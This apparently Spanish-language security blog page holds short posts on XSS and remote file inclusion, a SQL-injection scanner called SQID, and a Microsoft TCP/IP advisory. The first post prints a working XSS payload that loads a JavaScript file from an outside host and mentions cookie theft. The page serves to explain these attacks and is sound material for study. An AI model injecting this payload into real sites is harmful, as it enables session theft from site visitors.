XSS - JavaScript Injection
Mediante un archivo .js (JavaScript) es posible la “modificación” de una web, robar cookies, modificar, etc.. Este tipo de ataque es muy amplio y permite gran variedad de ocurrencias/casos.

(ejemplo vivo de cómo funciona)
URL .js:
http://maximilianosoler.com.ar/web/xss.js
XSS - JavaScript Injection:
=”><SCRIPT src=http://maximilianosoler.com.ar/web/xss.js></SCRIPT>
Saludos;
Maximiliano.
WebEditor y WebStAR Mail - XSS & RFI Vulns
Encontramos nuevas vulnerabilidades del tipo XSS y RFI en los siguientes software:
Ya se ha publicado en algunos sitios. Y fue reportado.
…Definiciones…
XSS, del inglés Cross-site scripting es un ataque basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().
Saludos.
Maximiliano.
SQID - sql injection digger
Estuve viendo un poco la utilidad SQID, que es un programa que busca SQL Injections y errores comunes en sitios web.
Utiliza 4 modos de búsqueda:
- URL
- Links de web
- Crawl mode.
Entre las cosas soportadas se encuentran:
- El uso de multiples “triggers”
- Soporte HTTPS
- Proxy
- Cookies.
Fue escrito en Ruby, ahora Ruby es Open Source. Y se lo pueden descargar de la siguiente web: http://www.ruby-lang.org/
Para obtener más informacion…sobre SQUID y descargarlo:
Saludos;
Maximiliano.
Vulnerabilidades en TCP/IP de Windows
Comenzó el año, las nuevas amenazas comienzan a salir a la luz y así también, las nuevas vulnerabilidades…
Microsoft publicó esta semana una vulnerabilidad CRÍTICA sobre sus Sistemas Operativos. Recomiendo instalar la actualización de seguridad !
![Vulnerabilidades - Microsoft [ MaximilianoSoler.com.ar ]](http://maximilianosoler.com.ar/blog/wp-content/uploads/2007/04/cursor-win.jpg)
Resumen ejecutivo
Esta actualización de seguridad crítica resuelve dos vulnerabilidades de las que se ha informado de forma privada en el procesamiento del Protocolo de control de transmisión/Protocolo de Internet (TCP/IP). Un atacante que aprovechara esta vulnerabilidad podría lograr el control completo de un sistema afectado. De esta forma, un intruso podría instalar programas; ver, cambiar o eliminar datos; o crear cuentas nuevas con todos los derechos de usuario.


